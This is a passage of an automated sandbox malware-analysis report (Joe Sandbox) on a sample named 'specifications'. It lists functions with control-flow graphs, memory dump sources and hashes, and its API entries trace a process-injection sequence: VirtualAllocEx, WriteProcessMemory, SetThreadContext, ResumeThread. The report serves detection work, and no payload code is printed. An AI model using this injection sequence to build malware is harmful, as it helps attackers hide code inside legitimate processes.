                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1631 2fe9104-2fe910e 1632 2fe9110-2fe91d1 CreateActCtxA 1631->1632 1634 2fe91da-2fe9234 1632->1634 1635 2fe91d3-2fe91d9 1632->1635 1642 2fe9236-2fe9239 1634->1642 1643 2fe9243-2fe9247 1634->1643 1635->1634 1642->1643 1644 2fe9258 1643->1644 1645 2fe9249-2fe9255 1643->1645 1647 2fe9259 1644->1647 1645->1644 1647->1647
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02FE91C1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 2289755597-3016476521
                                                                                                                                                                                  • Opcode ID: 17c934c5de0b748caa171dc46cc1c1d8a3ea619044885cfc41bcc56482f0af19
                                                                                                                                                                                  • Instruction ID: d75b97108b3318db37c4ec08f10094f484d022701be8b85bcb4d8507c266e8cc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17c934c5de0b748caa171dc46cc1c1d8a3ea619044885cfc41bcc56482f0af19
                                                                                                                                                                                  • Instruction Fuzzy Hash: D841D0B0C00619CEDF25CFA9C944BCEBBF6BF49704F20806AD419AB251DBB56945CFA1
                                                                                                                                                                                  Function 02FE7CCC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1648 2fe7ccc-2fe91d1 CreateActCtxA 1651 2fe91da-2fe9234 1648->1651 1652 2fe91d3-2fe91d9 1648->1652 1659 2fe9236-2fe9239 1651->1659 1660 2fe9243-2fe9247 1651->1660 1652->1651 1659->1660 1661 2fe9258 1660->1661 1662 2fe9249-2fe9255 1660->1662 1664 2fe9259 1661->1664 1662->1661 1664->1664
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02FE91C1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 2289755597-3016476521
                                                                                                                                                                                  • Opcode ID: ed9a380caf484f18b7e26fe5b7e3c903b6acc5649e806cb52f89e5fcd6cd0916
                                                                                                                                                                                  • Instruction ID: 5a12f6b12c2018a19f9e9439f18a6bf9a124590dc694b2df5fc136802e249249
                                                                                                                                                                                  • Opcode Fuzzy Hash: ed9a380caf484f18b7e26fe5b7e3c903b6acc5649e806cb52f89e5fcd6cd0916
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F41D1B0C00619CADF25CFA9C944B8EBBB5FF48304F20806AD519AB251DBB56945CFA0
                                                                                                                                                                                  Function 0A0A9A34 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1665 a0a9a34-a0aaa84 1667 a0aaa8f-a0aaa9e 1665->1667 1668 a0aaa86-a0aaa8c 1665->1668 1669 a0aaaa3-a0aaadc DrawTextExW 1667->1669 1670 a0aaaa0 1667->1670 1668->1667 1671 a0aaade-a0aaae4 1669->1671 1672 a0aaae5-a0aab02 1669->1672 1670->1669 1671->1672
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0A0AAA1D,?,?), ref: 0A0AAACF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745056349.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a0a0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DrawText
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 2175133113-3016476521
                                                                                                                                                                                  • Opcode ID: be2affead6a9a97cd63665af93aa01cf8aa00175695a2c17ec9f4af8982a642a
                                                                                                                                                                                  • Instruction ID: c6cff4a9f37651a8e228a2db96fb5e2ac87d52d37c1a42b239439e5854002be9
                                                                                                                                                                                  • Opcode Fuzzy Hash: be2affead6a9a97cd63665af93aa01cf8aa00175695a2c17ec9f4af8982a642a
                                                                                                                                                                                  • Instruction Fuzzy Hash: F231E2B5D0120D9FDB10CF9AD984AAEFBF5EB58320F14842AE919A7250D374A944CFA0
                                                                                                                                                                                  Function 0A39C590 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72injectionCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 1675 a39c590-a39c5e6 1677 a39c5e8-a39c5f4 1675->1677 1678 a39c5f6-a39c635 WriteProcessMemory 1675->1678 1677->1678 1680 a39c63e-a39c66e 1678->1680 1681 a39c637-a39c63d 1678->1681 1681->1680
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A39C628
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 3559483778-3016476521
                                                                                                                                                                                  • Opcode ID: d9887ec04126f67e638c9b73f4c8bfda851d918d9cc6c910f8f4ce2a621e3b77
                                                                                                                                                                                  • Instruction ID: 76c876934032290270af589289743d965b1d6ca0887ef911269c20175e2f136c
                                                                                                                                                                                  • Opcode Fuzzy Hash: d9887ec04126f67e638c9b73f4c8bfda851d918d9cc6c910f8f4ce2a621e3b77
                                                                                                                                                                                  • Instruction Fuzzy Hash: B72126B19002499FDF10CFA9C981BEEBFF1FF88310F148429E959A7251D7799940DB60
                                                                                                                                                                                  Function 0A0AAA30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0A0AAA1D,?,?), ref: 0A0AAACF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745056349.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a0a0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DrawText
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 2175133113-3016476521
                                                                                                                                                                                  • Opcode ID: f5189903952bb42bba1ee0cc0c60f1fd9e83745ad1a975e72279bdecd80ec16d
                                                                                                                                                                                  • Instruction ID: 7f8d9c3faa97c43bc8a0c7d94e2070b2f60a87cc269f21ad5dad9e27d17db42d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f5189903952bb42bba1ee0cc0c60f1fd9e83745ad1a975e72279bdecd80ec16d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31E0B590024A9FDB10CF9AD984A9EBBF5EB58320F14842AE818A7250D374A940CFA0
                                                                                                                                                                                  Function 0A39C598 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A39C628
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 3559483778-3016476521
                                                                                                                                                                                  • Opcode ID: d39c2180864fa3f3ebca2d418435481fde3683eadf78aaa34b51222a5093cf11
                                                                                                                                                                                  • Instruction ID: f460f4f07e36e943618884b0ad2644d5f684f31eb5b6cf0682d33a2141238182
                                                                                                                                                                                  • Opcode Fuzzy Hash: d39c2180864fa3f3ebca2d418435481fde3683eadf78aaa34b51222a5093cf11
                                                                                                                                                                                  • Instruction Fuzzy Hash: A02126B19003499FDF10CFAAC985BDEBBF5FF48320F14842AE919A7241D7789940DBA4
                                                                                                                                                                                  Function 0A39C3F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A39C47E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 983334009-3016476521
                                                                                                                                                                                  • Opcode ID: 16c63248baa88c91550e51f55a434055f6b8618bd38182df782b8f86b93707ab
                                                                                                                                                                                  • Instruction ID: 4f415d8b2a1b199245b81d39d1ab739f6c3b42ce1ec3c0477d27cac20552868f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16c63248baa88c91550e51f55a434055f6b8618bd38182df782b8f86b93707ab
                                                                                                                                                                                  • Instruction Fuzzy Hash: D52139B1D002098FDB10DFAAC4857EEBFF5AF88324F14842AD459A7241CB789945CFA1
                                                                                                                                                                                  Function 0A39C680 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A39C708
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 1726664587-3016476521
                                                                                                                                                                                  • Opcode ID: b6bbea1c1b4b1e361bb93ed1f9380dee6ab0d6ea216c148ea69a103ac37cd0eb
                                                                                                                                                                                  • Instruction ID: 87fd039609145f72dec2c9d96110d5adeb7acb0859df039836021a107f3de113
                                                                                                                                                                                  • Opcode Fuzzy Hash: b6bbea1c1b4b1e361bb93ed1f9380dee6ab0d6ea216c148ea69a103ac37cd0eb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 352128B1D003499FCF10DFAAC985ADEBBF5FF48320F10842AE959A7250D7789541DBA1
                                                                                                                                                                                  Function 0A39C688 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A39C708
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 1726664587-3016476521
                                                                                                                                                                                  • Opcode ID: 775d981c2aba0d16be33732079eeb0a3bba6086b0d54e91435eb1c464a6e1f54
                                                                                                                                                                                  • Instruction ID: 14c10788f3933b6309c90f96b2162ee58dfab0d6e7b5b52e7286344fcc86edf4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 775d981c2aba0d16be33732079eeb0a3bba6086b0d54e91435eb1c464a6e1f54
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A2128B19003499FCF10CFAAC985ADEFBF5FF48320F10842AE519A7240C7789540DBA1
                                                                                                                                                                                  Function 0A39C400 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A39C47E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 983334009-3016476521
                                                                                                                                                                                  • Opcode ID: f17c7d7015ac37e5b5320350463da9516aca4b50e093a13479410d5d5100c1e4
                                                                                                                                                                                  • Instruction ID: f8981ed1cfb0a5cd7a3d7effcf5bdb56b1d822dc3f2593571f522527731d1e01
                                                                                                                                                                                  • Opcode Fuzzy Hash: f17c7d7015ac37e5b5320350463da9516aca4b50e093a13479410d5d5100c1e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B2138B19003098FDB10CFAAC4857AEBFF4EF48324F14842AD419A7241CB78A945CFA1
                                                                                                                                                                                  Function 0A39C4D1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A39C546
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 4275171209-3016476521
                                                                                                                                                                                  • Opcode ID: 25deb99770748cd1473cef7244fc3dff7c955fcb7d4381a21c4e43238a3f9ec8
                                                                                                                                                                                  • Instruction ID: 14317929d7ee7482191b62f68cbd8768f8a707e66bda1ce952814bad75328f50
                                                                                                                                                                                  • Opcode Fuzzy Hash: 25deb99770748cd1473cef7244fc3dff7c955fcb7d4381a21c4e43238a3f9ec8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B1159759002499FDF20DFAAC845BEEBFF5AF88320F14881AE519A7250C779A540DFA0
                                                                                                                                                                                  Function 0A39C4D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A39C546
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 4275171209-3016476521
                                                                                                                                                                                  • Opcode ID: 320b083e59b7f89e161cae3170765f98c55ea9fc78bb6c7e8a6aa790ca6b6b3a
                                                                                                                                                                                  • Instruction ID: eab7b0e1dac73e5b707cb7dba66b0c562255d228dd7bcd155f41f20493c13498
                                                                                                                                                                                  • Opcode Fuzzy Hash: 320b083e59b7f89e161cae3170765f98c55ea9fc78bb6c7e8a6aa790ca6b6b3a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A71137719002499FDF10DFAAC845BDEBFF5EF88320F248419E519A7250C779A540DFA1
                                                                                                                                                                                  Function 0A39BF11 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0A39BF7A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 947044025-3016476521
                                                                                                                                                                                  • Opcode ID: 307f61d6e63396d4d571ecff108d982757d663d165675251c2ed4019a3a85656
                                                                                                                                                                                  • Instruction ID: aa7856bb4e07ea054dcee6b92c65616ba222d9c8f657bf31b4db3fb54c219a3e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 307f61d6e63396d4d571ecff108d982757d663d165675251c2ed4019a3a85656
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83115BB1D003498EDB20DFAAD4457EEFFF5AF88324F24881AD459A7250C779A540CFA4
                                                                                                                                                                                  Function 02FEBA60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02FEE52C), ref: 02FEE766
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 4139908857-3016476521
                                                                                                                                                                                  • Opcode ID: f52f5af1e389b15ad5607cdd8abfe6f47a380f7fe04c27fa4f920f2d2b7509e6
                                                                                                                                                                                  • Instruction ID: c2efa820ee287b525eab04996c851b10fcec7079c297b45c3b696870cc306482
                                                                                                                                                                                  • Opcode Fuzzy Hash: f52f5af1e389b15ad5607cdd8abfe6f47a380f7fe04c27fa4f920f2d2b7509e6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 241134B5C003498FDB10CF9AD545B9EFBF4EB48324F10845AD629B7200C374A545CFA4
                                                                                                                                                                                  Function 0A39BF18 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0A39BF7A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 947044025-3016476521
                                                                                                                                                                                  • Opcode ID: a3ea5b5f93c606d957f824efd39dba82f6d135a07288145314eee3aa97d773b3
                                                                                                                                                                                  • Instruction ID: c71ea47c6b5fa856e3eaaf8ed07890cbe9ab42fd78b48381edd1be9029f0acca
                                                                                                                                                                                  • Opcode Fuzzy Hash: a3ea5b5f93c606d957f824efd39dba82f6d135a07288145314eee3aa97d773b3
                                                                                                                                                                                  • Instruction Fuzzy Hash: E81128B1D003498FDB20DFAAC44579EFFF5AB88324F24841AD519A7240C779A940CFA5
                                                                                                                                                                                  Function 0A399108 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A39EB85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 410705778-3016476521
                                                                                                                                                                                  • Opcode ID: 23e4053db5a30c5444ca54d9f8ba8d81e0ec61b590448e8b9847facdef4103be
                                                                                                                                                                                  • Instruction ID: cc8a9a440e5b9e06158aa48decbb20b9450dbf74e9f6b0e9c9421fe666131656
                                                                                                                                                                                  • Opcode Fuzzy Hash: 23e4053db5a30c5444ca54d9f8ba8d81e0ec61b590448e8b9847facdef4103be
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7711E3B58043499FDB20CF99C585BDEBFF8EF48324F208459E519A7600C375A944CFA5
                                                                                                                                                                                  Function 0A39EB20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A39EB85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 410705778-3016476521
                                                                                                                                                                                  • Opcode ID: cb72b12c1021e6591789735a7fb5624b4bcb8b5cb4b237a4feea1216d82e33ea
                                                                                                                                                                                  • Instruction ID: 9adff61bf2e7f8a5fa5ef597ab132a34ebbfacc8a38863d4af60b0a1485ec1fe
                                                                                                                                                                                  • Opcode Fuzzy Hash: cb72b12c1021e6591789735a7fb5624b4bcb8b5cb4b237a4feea1216d82e33ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: F511E0B58003499FDB20CF99C585BDEFFF4EB48324F20885AE859A3200C379A944CFA1
                                                                                                                                                                                  Function 018ED3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733268251.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18ed000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f268165d11e8f809cbc170d61389ea1f715db62fdc34c695ba887843260f3a47
                                                                                                                                                                                  • Instruction ID: af87285ff21fd301ca52bb46a3dd49af234ebf21e4ef1f7c5c2270d2e3f1c702
                                                                                                                                                                                  • Opcode Fuzzy Hash: f268165d11e8f809cbc170d61389ea1f715db62fdc34c695ba887843260f3a47
                                                                                                                                                                                  • Instruction Fuzzy Hash: 712148B1104204DFDB05DF48C9C4B66BFA5FBA5328F20C66DE9098B256C336E54ACBA1
                                                                                                                                                                                  Function 018FD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733292144.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18fd000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f177142322daa1f80f2694ea8ca4f93b75e15ceaa00509db361aa31627b02566
                                                                                                                                                                                  • Instruction ID: 4ee0fe5d5ea3b4718639c4b061fd0a19f48eddf6c6530c8e458dcb3d2b3735da
                                                                                                                                                                                  • Opcode Fuzzy Hash: f177142322daa1f80f2694ea8ca4f93b75e15ceaa00509db361aa31627b02566
                                                                                                                                                                                  • Instruction Fuzzy Hash: 632122B1604204EFDB15DF58D9C0B26BB65FBC4358F20CA6DEB0A8B246C33AD507CA61
                                                                                                                                                                                  Function 018FD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733292144.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18fd000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9a527ea31aebd02479bce014d4a3846478177fbed9dbe0c70222191a655d79cb
                                                                                                                                                                                  • Instruction ID: 2bb058c008d2f96ead22de82924e2503b96a7a4c4d050d74445bb077078c367c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a527ea31aebd02479bce014d4a3846478177fbed9dbe0c70222191a655d79cb
                                                                                                                                                                                  • Instruction Fuzzy Hash: AA2149B9504204EFDB05DF98C5C0B26BB65FB84328F20C66DEB098B252C336E546CBA1
                                                                                                                                                                                  Function 018ED3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733268251.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18ed000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                                                                  • Instruction ID: 05393ebc39788dbb919293d95a9989fb1df915aba2019bb5bbd07fc9d303e842
